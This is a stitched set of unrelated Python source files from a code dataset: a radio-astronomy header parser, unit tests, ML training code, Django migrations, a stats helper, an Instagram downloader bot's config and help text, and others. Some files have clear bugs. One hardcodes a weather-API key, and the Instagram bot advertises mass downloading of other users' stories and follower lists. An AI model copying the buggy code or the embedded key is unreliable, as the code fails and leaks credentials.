# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
GUPPI Raw format
Headers:
Records are 80 chars, padded with spaces
Keywords are truncated/padded with spaces to 8 chars
"keyword1= <value>"
String values are enclosed in single-quotes
Numerical values typically not enclosed in quotes, but sometimes may be
Final record is always 'END' + ' '*77
Header keywords:
DIRECTIO: If present and non-zero, headers are padded to a 512-byte boundary
NBITS: No. bits per real component (e.g., 4 => 4+4-bit complex values); typical values: 8,4,2 (particularly 8)
BLOCSIZE: No. bytes per binary data block
OBSNCHAN (or NCHAN?)
NPOL: Single-pol if 1 else dual-pol
OBSFREQ: Centre freq of data
OBSBW: Bandwidth of data (may be negative to indicate high->low channel ordering)
BACKEND: 'GUPPI' for guppi/BL data
[CHAN_BW]
NTIME = BLOCSIZE * 8 / (2 * NPOL * NCHAN * NBITS)
Binary data:
[chan][time][pol][complex]
"""
import numpy as np
def read_header(f):
RECORD_LEN = 80
DIRECTIO_ALIGN_NBYTE = 512
buf = bytearray(RECORD_LEN)
hdr = {}
while True:
record = f.read(RECORD_LEN)
if len(record) < RECORD_LEN:
raise IOError("EOF reached in middle of header")
if record.startswith('END'):
break
key, val = record.split('=', 1)
key, val = key.strip(), val.strip()
if key in hdr:
raise KeyError("Duplicate header key:", key)
try: val = int(val)
except ValueError:
try: val = float(val)
except ValueError:
if val[0] not in set(["'",'"']):
raise ValueError("Invalid header value:", val)
val = val[1:-1] # Remove quotes
val = val.rstrip() # Remove padding within string
hdr[key] = val
if 'DIRECTIO' in hdr:
# Advance to alignment boundary
# Note: We avoid using seek() so that we can support Unix pipes
f.read(DIRECTIO_ALIGN_NBYTE - f.tell() % DIRECTIO_ALIGN_NBYTE)
if 'NPOL' in hdr:
# WAR for files with NPOL=4, which includes the complex components
hdr['NPOL'] = 1 if hdr['NPOL'] == 1 else 2
if 'NTIME' not in hdr:
# Compute and add NTIME parameter
hdr['NTIME'] = hdr['BLOCSIZE'] * 8 / (hdr['OBSNCHAN'] * hdr['NPOL'] *
2 * hdr['NBITS'])
return hdr
#def read_data(f, hdr):
# assert(hdr['NBITS'] == 8)
# count = hdr['BLOCSIZE']
# shape = (hdr['OBSNCHAN'], hdr['NTIME'], hdr['NPOL'])
# data = np.fromfile(f, dtype=np.int8, count=count)
# data = data.astype(np.float32).view(np.complex64)
# data = data.reshape(shape)
# return data
| StarcoderdataPython |
1854376 | <reponame>ayr-ton/Emberblast<gh_stars>1-10
from project.test.test import BaseTestCase
from project.message import print_player_stats, print_enemy_status
from .test_player import mock_player
from .test_map import mock_map
@mock_player()
@mock_map()
class TestModuleMessage(BaseTestCase):
def test_print_player_stats(self) -> None:
print_player_stats(self.mock_player)
def test_print_enemy_status(self) -> None:
print_enemy_status(self.mock_player)
def test_print_plain_matrix(self) -> None:
pass
| StarcoderdataPython |
5011836 | # Demo Python Lambda
'''
Python Lambda
A lambda function is a small anonymous function.
A lambda function can take any number of arguments, but can only have one expression.
Syntax
lambda arguments : expression
The expression is executed and the result is returned:
'''
# Lambda functions can take any number of arguments:
x = lambda a, b : a * b
print(x(5, 6)) | StarcoderdataPython |
1906075 | from __future__ import print_function
import argparse
import os
import random
import torch
import torch.nn.parallel
import torch.optim as optim
import torch.utils.data
from pointnet.dataset import ShapeNetDataset, ModelNetDataset
from lightning_solution.model import PointNetCls, feature_transform_regularizer
import torch.nn.functional as F
import pytorch_lightning as pl
from tqdm import tqdm
from pytorch_lightning.loggers import TensorBoardLogger
def train():
from utils.show3d_balls import showpoints
parser = argparse.ArgumentParser()
parser.add_argument(
'--batchSize', type=int, default=32, help='input batch size')
parser.add_argument(
'--num_points', type=int, default=2, help='input batch size')
parser.add_argument(
'--workers', type=int, help='number of data loading workers', default=4)
parser.add_argument(
'--nepoch', type=int, default=250, help='number of epochs to train for')
parser.add_argument('--outf', type=str, default='cls', help='output folder') ##TODO see if we want to include it
parser.add_argument('--model', type=str, default='', help='model path') ##TODO see if we want to include it
parser.add_argument('--dataset', type=str, required=True, help="dataset path")
parser.add_argument('--dataset_type', type=str, default='shapenet', help="dataset type shapenet|modelnet40")
parser.add_argument('--feature_transform', action='store_true', help="use feature transform")
parser.add_argument(
'--show', type=int, default=0, help="show 3d models every <> inputs")
parser.add_argument(
'--pretrain', type=str, default='', help="pretrained dir to laod model from (skip training)")
opt = parser.parse_args()
print(opt)
blue = lambda x: '\033[94m' + x + '\033[0m'
opt.manualSeed = random.randint(1, 10000) # fix seed
print("Random Seed: ", opt.manualSeed)
random.seed(opt.manualSeed)
torch.manual_seed(opt.manualSeed)
if opt.dataset_type == 'shapenet':
dataset = ShapeNetDataset(
root=opt.dataset,
classification=True,
npoints=opt.num_points)
test_dataset = ShapeNetDataset(
root=opt.dataset,
classification=True,
split='test',
npoints=opt.num_points,
data_augmentation=False)
elif opt.dataset_type == 'modelnet40':
dataset = ModelNetDataset(
root=opt.dataset,
npoints=opt.num_points,
split='trainval')
test_dataset = ModelNetDataset(
root=opt.dataset,
split='test',
npoints=opt.num_points,
data_augmentation=False)
else:
exit('wrong dataset type')
dataloader = torch.utils.data.DataLoader(
dataset,
batch_size=opt.batchSize,
shuffle=True,
num_workers=int(opt.workers))
testdataloader = torch.utils.data.DataLoader(
test_dataset,
batch_size=opt.batchSize,
shuffle=True,
num_workers=int(opt.workers))
print(len(dataset), len(test_dataset))
num_classes = len(dataset.classes)
print('classes', num_classes)
try:
os.makedirs(opt.outf)
except OSError:
pass
logger = TensorBoardLogger('tb_logs', name='ClsModel')
show_func = showpoints if opt.show !=0 else None
trainer = pl.Trainer(gpus=1,logger=logger, max_epochs= opt.nepoch)
if opt.pretrain == "":
print("training new model")
model = PointNetCls(k=num_classes,feature_transform=feature_transform_regularizer,show_points_func=show_func)
trainer.fit(model,dataloader)
elif os.path.exists(opt.pretrain):
print("loading existing model from ",opt.pretrain)
model = PointNetCls.load_from_checkpoint(opt.pretrain)
trainer = pl.Trainer(gpus=1 )
else:
print("ERROR!")
return
trainer.test(model,test_dataloaders=testdataloader)
if __name__ == "__main__":
train() | StarcoderdataPython |
5056798 | <gh_stars>0
from fastapi.testclient import TestClient
from main import app
client = TestClient(app)
def test_read_surveys():
response = client.get("/")
assert response.status_code == 200
def test_read_sightings():
response = client.get("/sightings")
assert response.status_code == 200
def test_read_sightings_id():
response = client.get("/sightings/1")
assert response.status_code == 404
assert response.json () == {"detail" : "sighting not found"} | StarcoderdataPython |
5159748 | <filename>Python_Brain/Python_Brain.py
import numpy as np
from matplotlib import pyplot as plt
import pandas as pd
import sys
class Csv_File:
Data: pd.DataFrame()
number_of_rows: int
number_of_columns: int
def __init__(self):
self.Data = pd.DataFrame()
self.number_of_rows = 0
self.number_of_columns = 0
def __str__(self):
print(self.Data)
return ""
def load_csv(self, Path: str):
try:
self.Data = pd.read_csv(Path)
self.number_of_columns = len(self.Data.columns)
self.number_of_rows = len(self.Data)
except:
print("There Was An Error In File Loading ,Check File Path/Name\n Process Terminated")
exit(12)
def write_csv(self, Filename: str):
try:
self.Data = self.Data[:]
self.Data.to_csv(Filename, index=False)
except:
print("There Was An Error In File Writing ,Check File Path/Name\n Process Terminated")
exit(12)
def get(self, Row: int, Column: str):
try:
return self.Data[Column].values.item(Row)
except:
print("There Was An Error In Fetching Value,Check Row/Column Numbers")
exit(12)
def get_row(self, Row: int):
try:
row = []
for i in self.Data.columns:
row.append(self.get(Row, i))
return row
except:
print("Error In Row Number")
exit(12)
def add_row(self, values: list):
if len(self.Data.columns) < len(values):
print("There Are More Values In Sample Then Columns In File")
exit(10)
else:
row = {}
for i in range(0, len(self.Data.columns)):
row[self.Data.columns[i]] = values[i]
self.Data = self.Data.append(row, ignore_index=True)
self.number_of_rows += 1
def get_column_values(self, column_name: str):
return self.Data[column_name].values
def add_column(self, column_name: str, values):
self.Data[column_name] = values
self.number_of_columns += 1
def set(self, Row: int, Column: str, val):
try:
self.Data[Column].values.itemset(Row, val)
except:
print("There Was An Error In Setting Value,Check Row/Column Numbers")
exit(12)
def remove_row(self, rows_to_drop: list):
self.Data = self.Data.drop(rows_to_drop)
self.number_of_rows -= len(rows_to_drop)
def remove_column(self, column: str):
self.Data = self.Data.drop(columns=column)
self.number_of_columns -= 1
def split_data(self, split_percentage: int):
if split_percentage > 100 or split_percentage < 0:
print("Split Precentage Must Be Between (0-100)")
exit(12)
else:
amount_needed = np.round((self.number_of_rows / 100) * split_percentage)
rng = np.random.default_rng()
selected_rows = rng.choice(self.number_of_rows, size=int(amount_needed), replace=False)
result = Csv_File()
result.Data = pd.DataFrame()
for i in self.Data.columns:
result.add_column(i, [])
for i in range(0, int(amount_needed)):
result.add_row(self.get_row(selected_rows[i]))
self.remove_row(selected_rows)
self.Data = self.Data.reset_index(drop=True)
return result
def replace_pattern_in_column(self, column: str, pattern, replace_width):
self.Data[column] = self.Data[column].replace(pattern, replace_width)
def number_of_missing(self):
return self.Data.isnull().sum().sum()
class Brain_Util:
def twoD_matrix_to_csv(matrix: np.ndarray):
shape = matrix.shape
result = Csv_File()
matrix = matrix.T
for i in range(0, shape[0]):
name = str.format("Column {}", i + 1)
result.add_column(name, matrix[i])
return result
def sigmoid(self, x):
return 1.0 / (1.0 + np.exp(-x))
class Python_Brain:
Data_Set: Csv_File
def load_data_set(self, data_set: Csv_File):
self.Data_Set = data_set
def pearson_correlation_coefficient(self, Y: np.ndarray, Y_HAT: np.ndarray):
sigma_xy = (Y * Y_HAT)
sigma_xy = sigma_xy.sum()
sigma_x = Y.sum()
sigma_y = Y_HAT.sum()
sigma_xs = (Y * Y).sum()
sigma_ys = (Y_HAT * Y_HAT).sum()
r = len(y) * sigma_xy - sigma_x * sigma_y
temp = len(Y) * sigma_xs - sigma_x * sigma_x
temp *= len(Y) * sigma_ys - sigma_y * sigma_y
r /= np.sqrt(temp)
return r
def rankify(self, array: np.ndarray):
ranks = np.zeros((len(array)), dtype=float)
for i in range(0, len(ranks)):
r, s = 1, 1
for j in range(0, i):
if array.item(j) < array.item(i):
r += 1
if array.item(j) == array.item(i):
s += 1
for j in range(i + 1, len(array)):
if array.item(j) < array.item(i):
r += 1
if array.item(j) == array.item(i):
s += 1
ranks[i] = (r + (s - 1) * 0.5)
return ranks
def spearman_correlation_coefficient(self, Y: np.ndarray, Y_HAT: np.ndarray):
rankY = self.rankify(Y)
rankYhat = self.rankify(Y_HAT)
sum_X = rankY.sum()
sum_Y = rankYhat.sum()
sum_XY = (rankY * rankYhat).sum()
squareSum_X = (rankY * rankY).sum()
squareSum_Y = (rankYhat * rankYhat).sum()
SCC = (len(Y) * sum_XY - sum_X * sum_Y) / np.sqrt(
(len(Y) * squareSum_X - sum_X * sum_X) * (len(Y) * squareSum_Y - sum_Y * sum_Y))
return SCC
def compute_column_correlations(self, correlation_type):
return self.Data_Set.Data.corr(method=correlation_type)
def linear_regression_static_formula(self, column_a: str, column_b: str):
sum_x = self.Data_Set.Data[column_a].values.sum()
sum_y = self.Data_Set.Data[column_b].values.sum()
sum_xy = (self.Data_Set.Data[column_a].values * self.Data_Set.Data[column_b].values).sum()
sum_xsquared = (self.Data_Set.Data[column_a].values * self.Data_Set.Data[column_a].values).sum()
sum_ysquared = (self.Data_Set.Data[column_b].values * self.Data_Set.Data[column_b].values).sum()
result = np.zeros(2)
result[0] = (sum_y * sum_xsquared - sum_x * sum_xy) / (
self.Data_Set.number_of_rows * sum_xsquared - sum_x * sum_x)
result[1] = (self.Data_Set.number_of_rows * sum_xy - sum_x * sum_y) / (
self.Data_Set.number_of_rows * sum_xsquared - sum_x * sum_x)
return result
def k_means(self, features: list, k: int, number_of_iterations: int):
means = np.zeros((k, len(features)))
for cluster in range(0, len(means)):
means[cluster] = [features[i].item(np.random.randint(0, len(features[i]))) for i in range(0, len(features))]
assignments = np.zeros(len(features[0]))
for iteration in range(0, number_of_iterations):
# Find assignments
for point in range(0, len(features[0])):
best_distance = sys.float_info.max
best_cluster = 0
for cluster in range(0, k):
sample = np.array([features[i].item(point) for i in range(0, len(features))])
distance = np.linalg.norm(sample - means.item(cluster))
if distance < best_distance:
best_distance = distance
best_cluster = cluster
assignments[point] = best_cluster
# Sum up and count points for each cluster
new_means = np.zeros((k, len(features)))
counts = np.zeros(k)
for point in range(0, len(features[0])):
cluster = assignments.item(point)
temp = np.zeros(len(features), dtype=np.float)
for fet in range(0, len(features)):
temp.itemset(fet, (new_means.item(int(cluster)) + features[fet].item(point)))
new_means[int(cluster)] = temp
counts[int(cluster)] += 1
for cluster in range(0, k):
count = max(1, counts.item(int(cluster)))
temp = np.zeros(len(features), dtype=np.float)
means[int(cluster)] = new_means[int(cluster)] / count
return means
def get_mse(self, Y: np.ndarray, Y_HAT: np.ndarray):
return ((Y - Y_HAT) ** 2).mean()
def get_mae(self, Y: np.ndarray, Y_HAT: np.ndarray):
return np.abs(Y - Y_HAT)
def get_r_squared(self, Y: np.ndarray, Y_HAT: np.ndarray):
PCC = self.pearson_correlation_coefficient(Y, Y_HAT)
return PCC * PCC
def get_adjusted_r_squared(self, Y: np.ndarray, Y_HAT: np.ndarray, Independent_Variables: int):
R_S = self.get_r_squared(Y, Y_HAT)
ARS = (1 - R_S) * (self.Data_Set.number_of_rows - 1)
ARS /= self.Data_Set.number_of_rows - 1 - Independent_Variables
ARS = 1.0 - ARS
return ARS
def confusion_matrix(self, regression_weights: np.ndarray, binary_column: str, sampled_rows: list,
decision_boundary: float):
CM = np.zeros((2, 2), dtype=float)
TruePositive, TrueNegative, FalsePositive, FalseNegative = 0, 0, 0, 0
for i in range(0, self.Data_Set.number_of_rows):
pred_s = regression_weights.item((0, 0))
for j in range(0, sampled_rows + 1):
pred_s += regression_weights[j, 0] * self.Data_Set.get(i, sampled_rows[j - 1])
pred_s = 0 if pred_s < decision_boundary else 1
actual = self.Data_Set.get(i, binary_column)
if pred_s == 0 and actual == 0:
TrueNegative += 1
elif pred_s == 1 and actual == 0:
FalsePositive += 1
elif pred_s == 1 and actual == 1:
TruePositive += 1
elif pred_s == 0 and actual == 1:
FalseNegative += 1
CM[0, 0] = TruePositive
CM[1, 0] = FalsePositive
CM[0, 1] = FalseNegative
CM[1, 1] = TrueNegative
return CM
def KNN(self,K:int ,test_values:list,sample_columns:list):
distances = np.zeros(self.Data_Set.number_of_rows)
x = np.zeros(len(sample_columns))
result = np.zeros((K,2))
for i in range(0,self.Data_Set.number_of_rows):
for j in range(0,len(sample_columns)):
x[j] = self.Data_Set.get(i,sample_columns[j])
dist = np.linalg.norm(x - test_values)
distances.itemset(i, dist)
knn = np.zeros(K)
min = sys.float_info.min
for i in range(0,K):
for j in range(0,len(distances)):
if distances.item(j) < min:
min = distances.item(j)
knn[i] = j
result[i,1] = min
distances[int(knn[i]-1)]=np.inf
min = sys.float_info.min
for i in range(0,K):
result[i,0] = knn[i]
return result
def step_gradient(self,Current_Weights,Learning_Rate,Columns_Of_Sampels,True_Y):
nof = len(Columns_Of_Sampels)+1
gradient = np.zeros((nof,1))
teta = np.array(Current_Weights)
values = np.zeros((nof,1))
prediction = np.array(Current_Weights)
teta = teta.T
for i in range(1,self.Data_Set.number_of_rows):
values[0,0] = 1
for j in range(1,nof):
values[j,0] = self.Data_Set.get(i,Columns_Of_Sampels[j-1])
h0 = teta*values
for j in range(0,nof):
gradient[j,0] += (h0[0,0] - self.Data_Set.get(i,True_Y)*values[j,0])
for j in range(0,nof):
gradient[j,0] *=Learning_Rate/self.Data_Set.number_of_rows
prediction[j,0] = prediction[j,0] -gradient[j,0]
return prediction
def linear_regression_gradient_descent(self,sample_columns:list,true_y,leaning_rate,number_of_iter):
LL = np.zeros((len(sample_columns)+1,1))
for i in range(number_of_iter):
LL = self.step_gradient(LL,leaning_rate,sample_columns,true_y)
return LL
z = Csv_File()
z.load_csv("30.csv")
b = Python_Brain()
b.load_data_set(z)
y = b.Data_Set.get_column_values('X1')
yh = b.Data_Set.get_column_values('X2')
print(b.linear_regression_gradient_descent(['X1'],['X2'],0.0003,100)) | StarcoderdataPython |
3586012 | <gh_stars>0
# FIXME Extinct
| StarcoderdataPython |
378 | # Generated by Django 4.0.1 on 2022-04-07 01:20
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('model_api', '0004_remove_order_created_remove_order_id_and_more'),
]
operations = [
migrations.RemoveField(
model_name='order',
name='dateTimeCreated',
),
migrations.AlterField(
model_name='order',
name='_id',
field=models.AutoField(editable=False, primary_key=True, serialize=False),
),
migrations.AlterField(
model_name='orderedproduct',
name='_id',
field=models.AutoField(editable=False, primary_key=True, serialize=False),
),
migrations.AlterField(
model_name='orderedproduct',
name='price',
field=models.CharField(blank=True, max_length=20, null=True),
),
]
| StarcoderdataPython |
5009211 | class PizzaBuilder():
def __init__(self, tamanio) -> None:
self.tamanio = tamanio
def addCheese(self):
self.addCheese = "doble queso"
return self
def addPepperoni(self):
self.addPepperoni = 'pepperoni'
return self
def addSalami(self):
self.addSalami = "salami"
return self
def addPimientos(self):
self.addPimientos = "pimientos"
return self
def addCebolla(self):
self.addCebolla = "cebolla"
return self
def addChampinones(self):
self.addChampiñones = "champinones"
return self
def __str__(self):
return f'Mi pizza es de {self._tamano}" con los siguientes ingredientes: salsa de tomate, queso, {self._chesse}, {self._pepperoni}, {self._salami}, {self._pimientos}, {self._cebolla} y {self._champinones}'
class PizzaDirector:
@staticmethod
def construct():
return PizzaBuilder(18)\
.addCheese()\
.addPepperoni()\
.addSalami()\
.addPimientos()\
.addCebolla()\
.addChampinones()
| StarcoderdataPython |
3448247 | from decimal import Decimal
class Candle(object):
bar = None
tenkan = 0.0
kijun = 0.0
senkouA = 0.0
senkouB = 0.0
pattern_long = None
pattern_short = None
def __init__(self, bar, tenkan, kijun, senkouA, senkouB, pattern_long=None, pattern_short=None):
self.bar = bar
self.tenkan = tenkan
self.kijun = kijun
self.senkouA = senkouA
self.senkouB = senkouB
self.pattern_long = pattern_long
self.pattern_short = pattern_short
@property
def Open(self):
return self.bar.Open
@property
def High(self):
return self.bar.High
@property
def Low(self):
return self.bar.Low
@property
def Close(self):
return self.bar.Close
@property
def Time(self):
return self.bar.EndTime
@property
def Tenkan(self):
return self.tenkan
@property
def Kijun(self):
return self.kijun
@property
def SenkouA(self):
return self.senkouA
@property
def SenkouB(self):
return self.senkouB
@property
def Chikou(self):
return self.bar.Close
@property
def OC(self):
return self.bar.Close - self.bar.Open
@property
def HL(self):
return self.bar.High - self.bar.Low
@property
def Kumo(self):
return self.SenkouA - self.SenkouB
@property
def KijunSenkouA(self):
return self.Kijun - self.SenkouA
@property
def KijunSenkouB(self):
return self.Kijun - self.SenkouB
@property
def KijunTenkan(self):
return abs(self.Kijun - self.Tenkan)
@property
def KijunClose(self):
return abs(self.Kijun - self.Close)
@property
def KijunOpen(self):
return abs(self.Kijun - self.Open)
@property
def SenkouAOpen(self):
return abs(self.SenkouA - self.Open)
@property
def SenkouBOpen(self):
return abs(self.SenkouA - self.Open)
@property
def isCloseBelowTenkan(self):
return self.Close < self.Tenkan
@property
def isCloseBelowKijun(self):
return self.Close < self.Kijun
@property
def isCloseAboveTenkan(self):
return self.Close > self.Tenkan
@property
def isCloseAboveKijun(self):
return self.Close > self.Kijun
@property
def isOpenBelowTenkan(self):
return self.Open < self.Tenkan
@property
def isOpenBelowKijun(self):
return self.Open < self.Kijun
@property
def isOpenAboveTenkan(self):
return self.Open > self.Tenkan
@property
def isOpenAboveKijun(self):
return self.Open > self.Kijun
@property
def isTenkanBelowKijun(self):
return self.Tenkan < self.Kijun
@property
def isTenkanAboveKijun(self):
return self.Tenkan > self.Kijun
@property
def MiddleOfBody(self):
if (self.HL - abs(self.OC)) < (self.HL * Decimal(0.4)):
thirty = abs(self.OC) / Decimal(3)
return (self.Low + thirty), (self.High - thirty)
return None
@property
def patternLongValue(self):
if self.pattern_long:
return self.pattern_long.Current.Value
return 0
@property
def patternShortValue(self):
if self.pattern_short:
return self.pattern_short.Current.Value
return 0
@property
def isPatternDown(self):
return self.patternShortValue == -1.0 and self.OC <= 0.0
@property
def isPatternUp(self):
return self.patternLongValue == 1.0 and self.OC >= 0.0
# close and ichimoku
@property
def isDown(self):
return self.OC < 0
@property
def isUp(self):
return self.OC > 0
| StarcoderdataPython |
8121925 |
# Agent names (is equal to method name of the agent)
from typing import Optional
class AgentNames:
AGENT_GATEWAY = "agent_gateway"
AGENT1 = "agent1"
AGENT_B = "agent_b"
AGENT_C = "agent_c"
AGENT_SAVE_TO_DISK = "agent_save_to_disk"
AGENT_TRANSFORMER_COLOR_BGR2GRAY = "agent_transformer_color_bgr2gray"
class AgentTopic:
@staticmethod
def get_agent_input_channel_name(agent_name: str) -> Optional[str]:
if agent_name == "":
return None
return AgentTopic._eval_agent_input_channel_name(agent_name)
@staticmethod
def _eval_agent_input_channel_name(agent_name: str) -> str:
input_channel_name = f"{agent_name.lower()}-input-topic"
return input_channel_name
| StarcoderdataPython |
5035036 | <filename>src/socialprofile/migrations/0024_auto_20220111_0008.py
# Generated by Django 3.2.11 on 2022-01-10 23:08
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("socialprofile", "0023_auto_20211216_1745"),
]
operations = [
migrations.AlterField(
model_name="socialprofile",
name="edited_by_facebook",
field=models.BooleanField(
blank=True, default=False, verbose_name="Facebook edited"
),
),
migrations.AlterField(
model_name="socialprofile",
name="edited_by_google",
field=models.BooleanField(
blank=True, default=False, verbose_name="Google edited"
),
),
migrations.AlterField(
model_name="socialprofile",
name="edited_by_instagram",
field=models.BooleanField(
blank=True, default=False, verbose_name="Instagram edited"
),
),
migrations.AlterField(
model_name="socialprofile",
name="edited_by_twitter",
field=models.BooleanField(
blank=True, default=False, verbose_name="Twitter edited"
),
),
migrations.AlterField(
model_name="socialprofile",
name="edited_by_user",
field=models.BooleanField(default=False, verbose_name="User edited"),
),
migrations.AlterField(
model_name="socialprofile",
name="google_isPlusUser",
field=models.BooleanField(
blank=True, default=False, null=True, verbose_name="Google Plus"
),
),
migrations.AlterField(
model_name="socialprofile",
name="google_verified",
field=models.BooleanField(
blank=True, default=False, null=True, verbose_name="Google Verified"
),
),
migrations.AlterField(
model_name="socialprofile",
name="image_avatar",
field=models.CharField(
blank=True,
choices=[
("socials", "Socials"),
("predef", "Predefined"),
("custom", "Custom"),
],
default="socials",
max_length=100,
verbose_name="Avatar Picture",
),
),
migrations.AlterField(
model_name="socialprofile",
name="image_avatar_predef",
field=models.CharField(
blank=True,
choices=[
("avatar1.png", "Male 1"),
("avatar2.png", "Male 2"),
("avatar3.png", "Female 1"),
("avatar4.png", "Male 3"),
("avatar5.png", "Male 4"),
("avatar6.png", "Male 5"),
("avatar7.png", "Male 6"),
("avatar8.png", "Female 2"),
],
default="avatar1.png",
max_length=100,
verbose_name="Predef Avatar Picture",
),
),
migrations.AlterField(
model_name="socialprofile",
name="is_active",
field=models.BooleanField(
blank=True,
default=True,
help_text="Designates whether this user should be treated as active. Unselect this instead of deleting accounts.",
null=True,
verbose_name="Active",
),
),
migrations.AlterField(
model_name="socialprofile",
name="is_staff",
field=models.BooleanField(
blank=True,
default=False,
help_text="Designates whether the user can log into this admin site.",
null=True,
verbose_name="Staff",
),
),
migrations.AlterField(
model_name="socialprofile",
name="twitter_verified",
field=models.BooleanField(
blank=True, default=False, null=True, verbose_name="Twitter Verified"
),
),
]
| StarcoderdataPython |
9674111 | <filename>download_url_generator/wunderground.py
from pathlib import Path
from utility import next_date
def download_links(base_path):
base_url = 'https://api-ak.wunderground.com/api/606f3f6977348613/history_{}/units:metric/v:2.0/q/pws:{}.json'
weather_station = 'IUFFENHE3'
inputs = [
(Path(base_path, '{}.json'.format(formatted_date)),
base_url.format(formatted_date, weather_station))
for formatted_date in (current_date.strftime('%Y%m%d')
for current_date in next_date())
]
return inputs
| StarcoderdataPython |
146977 | from fastapi.testclient import TestClient
from app import app
import json
import psycopg2
import random
import string
import base64
from cryptography.hazmat.primitives import serialization, hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.hazmat.backends import default_backend
import sys
import bcrypt
testmail = "<EMAIL>" #TODO fill in (This is where the test emails get send to)
conn = psycopg2.connect("dbname='auth_db' user='auth_db' host='auth_db' [redacted-2]")
cursor = conn.cursor()
if len(sys.argv) < 2:
print("Too few arguments. Try 'setup' or 'cleanup'!")
elif sys.argv[1] == "setup":
hashed = bcrypt.hashpw("password".encode('utf8'), bcrypt.gensalt()).decode("ascii")
cursor.execute("INSERT INTO users(uid,email,password,permissions) VALUES(9999,'"+testmail+"',%s,0)",(hashed,))
cursor.execute("INSERT INTO wdcodes(wdcode,uid,secret) VALUES('xxxxxxxxxxxxxxxx',9999,'[redacted-7]')")
conn.commit()
print("SUCCESS!")
elif sys.argv[1] == "cleanup":
cursor.execute("DELETE FROM users WHERE uid=9999")
cursor.execute("DELETE FROM wdcodes WHERE uid=9999")
conn.commit()
print("SUCCESS!")
else:
print("Possible commands:")
print("setup")
print("cleanup")
| StarcoderdataPython |
3547188 | <gh_stars>0
import os
from instaloader import Instaloader
class Config:
API_ID = int(os.environ.get("API_ID", ""))
API_HASH = os.environ.get("API_HASH", "")
BOT_TOKEN = os.environ.get("BOT_TOKEN", "")
USER = os.environ.get("INSTAGRAM_USERNAME", "")
OWNER = os.environ.get("OWNER_ID", "")
INSTA_SESSIONFILE_ID = os.environ.get("INSTA_SESSIONFILE_ID", None)
S = "0"
STATUS = set(int(x) for x in (S).split())
L=Instaloader()
HELP="""
I can Download almost anything From your Instagram Account hehe.
<b>What Can Be Downloaded?:</b>
1. All posts of any Profile. (Both Public and Private,for private profiles you need to be a follower.)
2. All Posts from your feed(but don't try to spam).
3. Stories of any profile (Both Public and Private,for private profiles you need to be a follower.)
4. DP of any profile
5. Followers and Following List of any Profile.
6. List of followers who follows back the given username.
7. List of followers who are not following back the given username.
8. Stories of your Followers.
9. Tagged posts of any profile.
10. Your saved Posts.
11. IGTV videos.
12. Highlights from any profiles.
13. Any Public Post from Link(Post/Reels/IGTV)
I can do anything sir
<b>How to Download:</b>
Its Easy!!
But login first with /login command.
You have two Options:
1. From Username:
Just send any instagram username.
For Example:
<code>feat.zai</code>
<code>z4iee</code>
<code>2ampillow</code>
2. From URL:
You can also sent a post link to download the post or video.
<b>Available Commands and Usage</b>
/start - To check whether I'm alive! But seriously I wanna die.
/restart - Restart me ofc (If you messed up anything use /restart to cool me down.)
/help - Shows this sh*t.
/login - ofc Login into your account.
/logout - Logout of your account.
/account - Shows the details of ur acc.
/posts <username> - Download posts of any username. Use /posts to download own posts.
Example : why should I provide you?
/igtv <username> - Downloads igtv video even though who sees igtv videos.
/feed <number of posts to download> - Downloads posts from your feed (provide no of posts). .
Eg: <code>/feed 10</code> to download latest 10 posts from feed.
/saved <number of posts to download> - Downloads your saved posts(remember to provide no of posts).
Example: <code>/saved 10</code> to download latest 10 saved posts.
/followers <username> - Get a list of all followers of given username.
/fans <username> - Get a list of of followees who follow back the given username.
/notfollowing <username> - Get a list of punks who don't follow back! .
/tagged <username> - Downloads all posts in which given username is tagged.
/story <username> - Downloads all stories from given username.
/stories - Downloads all the stories of all your followers.
/highlights <username> - Downloads highlights from given username.
"""
HOME_TEXT = """
<b>Hi ishigami here, [{}](tg://user?id={})
I work for my president to manage student council (ig)
I will only work for my master [{}](tg://user?id={}).
Use /help to know What I can Do?</b>
"""
HOME_TEXT_OWNER = """
<b>Hi, [{}](tg://user?id={})
I'm ishgami to manage your Instagram account.
Use /help to know what I can do for you.</b>
"""
| StarcoderdataPython |
6669362 | <reponame>nidhiteresa216/Studentregform
# Generated by Django 3.2.10 on 2022-01-04 19:33
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Details',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=30, verbose_name='Student First Name')),
('last_name', models.CharField(max_length=60, verbose_name='Student Last Name')),
('date_of_birth', models.DateTimeField(verbose_name='Date Of Birth')),
('phone', models.CharField(max_length=12, verbose_name='Contact')),
('email', models.EmailField(max_length=254, verbose_name='EmailID')),
('address', models.CharField(max_length=250, verbose_name='Residence')),
('college_name', models.CharField(max_length=100, verbose_name='College Name')),
('course', models.CharField(max_length=50, verbose_name='Course Name')),
('about', models.TextField(blank=True)),
],
),
]
| StarcoderdataPython |
246359 | <reponame>brenns10/smbio
"""Demo for smbio.util.progress stuff."""
from smbio.util.progress import progress, pzip, progress_bar
import time
# Index tells it which index positional argument contains the number of
# iterations.
@progress_bar(index=0)
def fib(n):
prev = 0
curr = 1
for _ in range(n):
yield curr
new = prev + curr
prev = curr
curr = new
def main():
for n in fib(20):
print(n)
time.sleep(0.05)
for x in progress(range(10)):
time.sleep(0.1)
for x in pzip(range(10), range(20)):
time.sleep(0.1)
if __name__ == '__main__':
main()
| StarcoderdataPython |
3571167 | <filename>v2/tests/security/views/test_resend_confirmation_email.py<gh_stars>100-1000
import pytest
from flask import url_for
@pytest.mark.usefixtures('user')
class TestResendConfirmation:
def test_email_required(self, api_client):
r = api_client.post(url_for('api.resend_confirmation_email'))
assert r.status_code == 400
assert 'email' in r.errors
def test_cannot_reconfirm(self, user, api_client):
r = api_client.post(url_for('api.resend_confirmation_email'),
data=dict(email=user.email))
assert r.status_code == 400
assert 'Your email has already been confirmed.' in r.errors['email']
@pytest.mark.options(SECURITY_CONFIRMABLE=True)
def test_instructions_resent(self, api_client, outbox, templates):
from backend.security.models import User
from backend.security.views.user_resource import register_user
user = User(username='test',
email='<EMAIL>',
